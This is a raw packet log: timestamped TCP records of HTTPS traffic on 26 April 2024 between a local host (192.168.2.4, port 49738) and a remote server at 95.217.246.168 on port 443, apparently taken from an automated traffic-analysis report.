Apr 26, 2024 21:35:23.148123026 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.165360928 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.165385008 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.165669918 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.165685892 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.165729046 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.179737091 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.179754019 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.179843903 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.179855108 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.179894924 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.194909096 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.194932938 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.194996119 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.195002079 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.195044994 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.207814932 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.207838058 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.207928896 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.207942963 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.207988024 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.222649097 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.222668886 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.222732067 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.222740889 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.222781897 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.235188961 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.235243082 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.235275984 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.235284090 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.235305071 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.235326052 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.250741005 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.250760078 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.250823021 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.250829935 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.250871897 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.260961056 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.260977983 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.261039972 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.261048079 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.261085033 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.271781921 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.271800995 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.271908045 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.271913052 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.271956921 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.282099009 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.282116890 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.282211065 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.282217979 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.282269001 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.293193102 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.293220043 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.293282986 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.293292999 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.293304920 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.293334007 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.304404020 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.304419994 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.304536104 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.304547071 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.304590940 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.314135075 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.314152956 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.314239025 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.314246893 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.314284086 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.324656010 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.324671984 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.324733019 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.324740887 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.324781895 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.334336996 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.334352970 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.334425926 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.334433079 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.334474087 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.343061924 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.343084097 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.343147993 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.343156099 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.343194008 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.351429939 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.351449013 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.351511002 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.351521969 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.351576090 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.361174107 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.361201048 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.361294985 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.361306906 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.361349106 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.369729996 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.369745970 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.369813919 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.369822025 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.369863987 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.378706932 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.378722906 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.378793001 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.378798008 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.378837109 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.386907101 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.386923075 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.387010098 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.387016058 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.387058020 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.397288084 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.397305012 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.397403955 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.397411108 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.397454023 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.406137943 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.406155109 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.406275034 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.406286955 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.406330109 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.416234016 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.416250944 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.416464090 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.416471004 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.416518927 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.424720049 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.424738884 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.424860001 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.424879074 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.424917936 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.431377888 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.431396961 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.431483030 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.431497097 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.431534052 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.439676046 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.439692974 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.439810038 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.439821005 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.439858913 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.446460009 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.446475029 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.446563005 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.446574926 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.446611881 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.453301907 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.453320026 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.453442097 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.453453064 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.453493118 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.460983992 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.460999012 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.461088896 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.461100101 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.461138964 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.466811895 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.466826916 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.466909885 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.466919899 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.466959953 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.474425077 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.474441051 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.474538088 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.474549055 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.474590063 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.480070114 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.480091095 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.480174065 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.480184078 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.480223894 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.487104893 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.487118959 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.487229109 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.487237930 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.487276077 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.493557930 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.493575096 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.493664980 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.493675947 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.493731976 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.499821901 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.499836922 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.499927998 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.499938965 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.499975920 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.506433964 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.506449938 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.506644964 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.506655931 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.506696939 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.512279987 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.512298107 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.512456894 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.512468100 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.512505054 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.518913031 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.518929958 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.519011021 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.519021988 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.519057989 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.523895025 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.523915052 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.523983955 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.523993969 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.524033070 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.530109882 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.530126095 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.530209064 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.530217886 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.530257940 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.535485029 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.535502911 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.535568953 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.535582066 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.535749912 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.541677952 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.541693926 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.541759014 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.541770935 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.541822910 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.547403097 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.547439098 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.547509909 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.547522068 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.547549963 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.547566891 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.552903891 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.552947998 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.552978039 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.552987099 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.553015947 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.553034067 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.558276892 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.558295012 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.558368921 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.558378935 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.558417082 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.563556910 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.563591003 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.563646078 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.563657999 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.563677073 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.563695908 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.570991039 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.571026087 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.571088076 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.571105957 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.571146011 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.586354971 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.586371899 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.586498022 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.586508989 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.586550951 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.593816042 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.593833923 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.593923092 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.593933105 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.593965054 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.596735954 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.596750975 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.596813917 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.596822977 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.596874952 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.602458954 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.602478027 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.602550983 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.602560997 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.602596998 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.606751919 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.606766939 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.606837988 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.606848001 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.606882095 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.611186028 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.611205101 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.611263037 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.611274004 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.611313105 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.615366936 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.615386963 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.615457058 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.615468025 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.615508080 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.619221926 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.619237900 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.619317055 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.619324923 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.619359016 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.622642994 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.622658014 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.622735977 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.622745991 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.622783899 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.624963045 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.624978065 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.625061035 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.625071049 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.625117064 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.626125097 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.626140118 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.626205921 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.626213074 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.626257896 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.627258062 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.627273083 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.627367020 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.627374887 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.627430916 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.631530046 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.631556988 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.631604910 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.631614923 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.631628990 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.631653070 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.635623932 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.635638952 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.635719061 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.635730028 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.635762930 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.639905930 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.639928102 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.640012026 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.640022993 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.640064955 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.644635916 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.644651890 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.644743919 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.644754887 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.644800901 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.648611069 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.648627043 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.648798943 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.648807049 CEST	443	49738	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:23.648848057 CEST	49738	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:23.652082920 CEST	443	49738	95.217.246.168	192.168.2.4
